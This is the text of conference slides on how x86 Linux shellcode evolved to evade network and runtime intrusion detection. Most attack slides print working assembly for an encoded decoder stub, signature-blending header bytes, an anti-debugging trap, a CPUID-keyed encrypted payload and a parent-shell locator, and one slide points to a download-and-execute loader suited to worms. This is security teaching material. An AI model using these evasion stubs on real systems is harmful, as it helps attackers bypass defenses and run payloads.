Shellcode Evolution
Download
Report
Transcript Shellcode Evolution
Shellcodes Evolution
Itzik Kotler
[email protected]
Killing time till the feds arrive
Shellcode
• Machine code used as the payload in
the exploitation of a software bug
• Whenever altering a program flow,
shellcodes become it's natural
continuation
• Common in exploitation of
vulnerabilities such as stack and heapbased buffer overflows as well as
format strings attacks
What shellcodes can do?
• Providing access to the attacked
system
– Spawning /bin/sh [or] cmd.exe (local shell)
– Binding a shell to a port (remote shell)
– Adding root/admin user to the system
– Chmod()’ing /etc/shadow to be writeable
• Anything that you want, as long as you
code it.
World vs. Shellcodes
• NIDS (Net Intrusion Detection System)
– Signatures
– Protocol analysis
• IPS (Intrusion Prevention System)
– Sandbox/Emulation
• Non standard installation
– Different paths for common binaries (/bin/sh)
• Size issue
– Protocols enforce different buffer sizes
Defense: Wire diagnose
• Recognize and classify network traffic
prior to reaching its destination
– Allows searching for signatures/patterns
• The strength of this method comes
from how well the rules were compiled
• Common feature in NIDS
Shellcodes vs. Wire diagnose
• Encoding (polymorphism)
– Attacks the signatures by masking the
bytes and later decode or extract them
back
• Blending (raising the false-positive bar)
– Attacks the signatures by blending
unsuspicious bytes into the shellcode
ones
• Tunnel through VPN/SSL (encryption)
– Make’s it impossible to decode the stream
Attack: Shellcode Encoding
pushl $0x81cee28a
pushl $0x54530cb1
pushl $0xe48a6f6a
pushl $0x63306901
pushl $0x69743069
pushl $0x14
popl %ecx
#
#
#
#
#
#
#
PUSH 4 bytes of encoded (+1) payload
...
...
...
...
ECX = Length of payload
_unpack_loop:
# Decoding loop
decb (%esp, %ecx, 1) # Decrease byte at ESP[ECX]
decl %ecx
# Decrease loop counter
jns _unpack_loop
#
incl %ecx
mul %ecx
push %esp
Ret
#
#
#
#
ECX = 0 (previously -1 from loop)
Zero out EAX,ECX,EDX (Optimizing trick)
Push address of decoded shellcode
Jump to the decoded shellcode
Attack: Shellcode Blending
#
# PK[\03\04], PK[Zip] archive data header
#
.byte
.byte
.byte
.byte
.byte
0x50
0x4b
0x03
0x04
0x24
#
# Bitmap 24bit Header
#
.byte
.byte
.byte
.byte
0x42
0x4D
0x36
0x91
Defense: Runtime diagnose
• Recognize classified execution outputs
of codes which were marked
suspicious of being shellcode
• The strength of this method comes
from it's active approach toward the
network traffic
• Completion for Wire diagnose
Shellcodes vs. Runtime diagnose
• Anti-debugging tricks
– Embedding anti-debugging tricks into
shellcodes to fight debugging attempts
• Pre-shared key encryption
– Encrypt the shellcode against an identifier
which known to the attacker and is unique
or reachable from the attacked machine
and be used as the key
Attack: Anti-debugging Shellcode
push $0x30
popl %eax
push $0x5
popl %ebx
jmp _evil_code
#
# EAX = 30h (SIGNAL_SYSCALL)
#
# EBX = 05h (SIGTRAP)
# Register signal handler
_evilcode_loc:
popl %ecx
int $0x80
#
# ECX = EIP
# Execute syscall [EAX=signal|exit]
int3
# Debugger trap
incl %eax
# Alternative code flow [EAX=exit]
evil_code:
call _evilcode_loc
# Dummy call (push EIP+1 on stack)
# push EIP+1 on stack
nop
# Address registered as SIGTRAP Handler
Attack: PSK Encrypted Shellcode
xorl %eax, %eax
cpuid
# Zero out EAX for CPUID
# ECX = Key (set by CPUID)
pushl
pushl
pushl
pushl
pushl
pushl
#
#
#
#
#
#
%ecx
$0xeca895e7
$0x3f377fde
$0x8fec1a07
$0x0e4a1c6e
$0x04165b06
PUSH Key (Loop Stop Condition)
PUSH 4 bytes of XOR’ed payload
...
...
...
...
unpack_loop:
xorl %ecx, (%esp)
popl %edx
jnz _unpack_loop
# Decrypt loop
# ENCRYPTED_DWORD ^= Key
# (*ESP) = Next ENCRYPTED_DWORD
#
subl $0x18, %esp
pushl %esp
ret
# Re-adjust ESP to beginning of payload
# Push address of decrypted shellcode
# Jump to the decrypted shellcode
Defense: Customizing
• Linux and *BSD has the flexibility
which allows administrators and
power-users to rearrange the system
layout as they wish
Shellcodes vs. Non standard path
• Processes hierarchy scanning
– Scanning the parent-child topology, it will
be clear that at a range of 0-3 depths
within the tree, the parent process is most
likely to be a shell.
– Exception to this is the 'initd' process,
started by the kernel itself.
Attack: Non standard shell locater
& executer shellcode
push $0x40
popl %eax
int $0x80
#
# EAX = 40h (SYSCALL_GETPPID)
# EAX = Parent pid process #
_convert:
decl %esp
cdq
pushl $0xa
popl %ebx
divl %ebx
addb $0x30, %dl
movb %dl, (%esp)
testl %eax, %eax
jnz _convert
cdq
# Convert from INT to ASCII
#
#
#
#
#
#
#
#
#
# IF (EAX < FFFFh) EDX = NULL (Optimizing trick)
popl %ebx
pushl %edx
pushl $0x6578652f
pushl %ebx
pushl $0x2f636f72
pushl $0x702f2f2f
movb $0xb, %al
movl %esp, %ebx
pushl %edx
pushl %ebx
movl %esp, %ecx
int $0x80
#
#
#
#
#
#
#
#
#
#
#
#
EBX = PID (ASCII STRING)
PUSH NULL
PUSH “/exe”
PUSH PID (ASCII STRING)
PUSH “roc/”
PUSH “///p”
EAX = 0Bh (SYSCALL_EXECVE)
EBX = char *filename
EDX = **envp
ARRAY = [ filename , NULL ]
ECX = **argv
EQUALS execve(“/proc/<PARENT-PID>/exe”, argv, envp);
Exploitation Limitations
• Not a defense per se, but still an
obstacle
• The most popular limitation is the size
limitation, which requires the shellcode
to shrink at times
• There is a a tradeoff between the
shellcode functionality level and it's
size
• Boys ‘n girls the size does matter!!!!
Shellcodes vs. Size limitation
• Stages
– Dividing every logical operation into
smaller actions allows the creation of a
pipeline
Attack: HTTP Loader Shellcode
• Sorry too big to fit into a presentation
– Go fish at http://www.tty64.org for it
• There are two versions of HTTP fetcher
– ELF binary download and execute [bigger]
– Binary download and execute [smaller]
• Allows automation in pentesting
– set up a web server which confirms once a
system has been exploited by watching hits from
the loader arrive
– Can be used for self-spreading worms and
viruses
Future planned projects
• Runtime shellcodes framework
– Support for plugins and modules
• API in Assembly and C languages
– Cross platform support
• Linux, Windows, *BSD, …
• Shellcode compressor
– Ideal for big/complex shellcodes
Questions?
[email protected]
http://www.tty64.org